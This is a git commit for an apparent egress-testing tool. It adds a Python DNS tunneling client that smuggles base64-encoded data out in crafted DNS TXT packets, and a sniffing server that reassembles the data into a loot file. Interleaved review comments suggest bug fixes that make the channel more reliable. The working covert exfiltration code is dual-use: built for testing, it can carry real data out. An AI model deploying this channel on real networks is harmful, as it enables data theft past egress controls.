Added DNS tunneling

resolved_file
Chris Truncer 2015-01-13 10:17:40 -05:00
parent d51664aed6
commit 7bc76876b3
3 changed files with 132 additions and 0 deletions


@ -6,6 +6,7 @@
# capabilities.
import logging
import sys
from common import helpers
from common import orchestra
@ -13,6 +14,8 @@ from common import orchestra
if __name__ == "__main__":
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
helpers.title_screen()
cli_parsed = helpers.cli_parser()


@ -0,0 +1,74 @@
'''
This is a DNS client that transmits data within DNS TXT requests
Thanks to Raffi for his awesome blog posts on how this can be done
http://blog.cobaltstrike.com/2013/06/20/thatll-never-work-we-dont-allow-port-53-out/
'''
import base64
import re
import socket
import sys
from scapy.all import *
class Client:
def __init__(self, cli_object):
self.protocol = "dns"
self.length = 62
self.remote_server = cli_object.ip
def transmit(self, data_to_transmit):
byte_reader = 0
packet_number = 1
# Determine if sending via IP or domain name
if self.validate_ip(self.remote_server):
final_destination = self.remote_server
else:
print "[*] Resolving IP of domain..."
final_destination = socket.gethostbyname(self.remote_server)
while (byte_reader < len(data_to_transmit) + 35):
encoded_data = base64.b64encode(data_to_transmit[byte_reader:byte_reader + 35])
# calcalate total packets
if ((len(data_to_transmit) % 35) == 0):
total_packets = len(data_to_transmit) / 35
else:
total_packets = (len(data_to_transmit) / 35) + 1
print "[*] Packet Number/Total Packets: " + str(packet_number) + "/" + str(total_packets)
# Craft the packet with scapy
try:
send(IP(dst=final_destination)/UDP()/DNS(
id=15, opcode=0,
qd=[DNSQR(qname="egress-assess.com", qtype="TXT")], aa=1, qr=0,
an=[DNSRR(rrname=encoded_data, type="TXT", ttl=10)]),
verbose=False)
except KeyboardInterrupt:
print "[*] Shutting down..."
sys.exit()
# Increment counters
byte_reader += 35
packet_number += 1
return
def validate_ip(self, val_ip):
# This came from (Mult-line link for pep8 compliance)
# http://python-iptools.googlecode.com/svn-history/r4
# /trunk/iptools/__init__.py
ip_re = re.compile(r'^(\d{1,3}\.){0,3}\d{1,3}$')
if ip_re.match(val_ip):
quads = (int(q) for q in val_ip.split('.'))
for q in quads:
if q > 255:
return False
return True
return False
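Review bot: The loop condition `while (byte_reader < len(data_to_transmit) + 35)` runs one iteration too many, so the final packet carries an empty rrname and the progress line reports one more packet than `total_packets` (e.g. 3/2); `while byte_reader < len(data_to_transmit):` fixes it, and `total_packets` should be computed once before the loop rather than recomputed on every iteration. `validate_ip`'s pattern `^(\d{1,3}\.){0,3}\d{1,3}$` accepts one- to three-part strings such as `10.1`, which are then handed to scapy unresolved instead of going through `gethostbyname`; `{3}` in place of `{0,3}` requires all four octets. `self.length = 62` set in `__init__` is never read, while the chunk size 35 is repeated five times in `transmit`; using one attribute for the chunk size would keep the client and any server-side reassembly in step.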


@ -0,0 +1,55 @@
'''
This is a DNS Listening/server module that listens for requests, and
writes out data within TXT requests to a file
'''
import base64
import time
from common import helpers
from scapy.all import *
class Server:
def __init__(self, cli_object):
self.protocol = "dns"
self.last_packet = ''
self.file_name = ''
self.loot_path = ''
def customAction(self, packet):
if packet.haslayer(DNSRR):
dnsrr_strings = repr(packet[DNSRR])
try:
incoming_data = base64.b64decode(dnsrr_strings.split('\'')[1].rstrip('.'))
except TypeError:
pass
if incoming_data == self.last_packet:
pass
else:
with open(self.loot_path + self.file_name, 'a') as dns_out:
dns_out.write(incoming_data)
self.last_packet = incoming_data
return
def serve(self):
self.loot_path = os.path.join(helpers.ea_path(), "data") + "/"
# Check to make sure the agent directory exists, and a loot
# directory for the agent. If not, make them
if not os.path.isdir(self.loot_path):
os.makedirs(self.loot_path)
# Get the date info
current_date = time.strftime("%m/%d/%Y")
current_time = time.strftime("%H:%M:%S")
self.file_name = current_date.replace("/", "") +\
"_" + current_time.replace(":", "") + "text_data.txt"
print "[*] DNS server started!"
sniff(prn=self.customAction)
return
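Review bot: In `customAction`, `incoming_data` is only bound inside the `try`, so a packet whose rrname is not valid base64 takes the `except TypeError: pass` branch and then raises `UnboundLocalError` at `if incoming_data == self.last_packet`; the handler should `return` instead of `pass`. Extracting the name via `repr(packet[DNSRR]).split('\'')[1]` depends on scapy's repr formatting — `packet[DNSRR].rrname.rstrip('.')` reads the same field directly. `os` is used in `serve` (`os.path.join`, `os.makedirs`) but never imported in this file; it appears to work only because `from scapy.all import *` happens to re-export it, so add an explicit `import os`. Because `sniff()` is called without a `filter`, every captured packet runs through the callback and any host on the segment can append to the loot file; `sniff(filter="udp port 53", prn=self.customAction)` at least narrows the capture to DNS traffic.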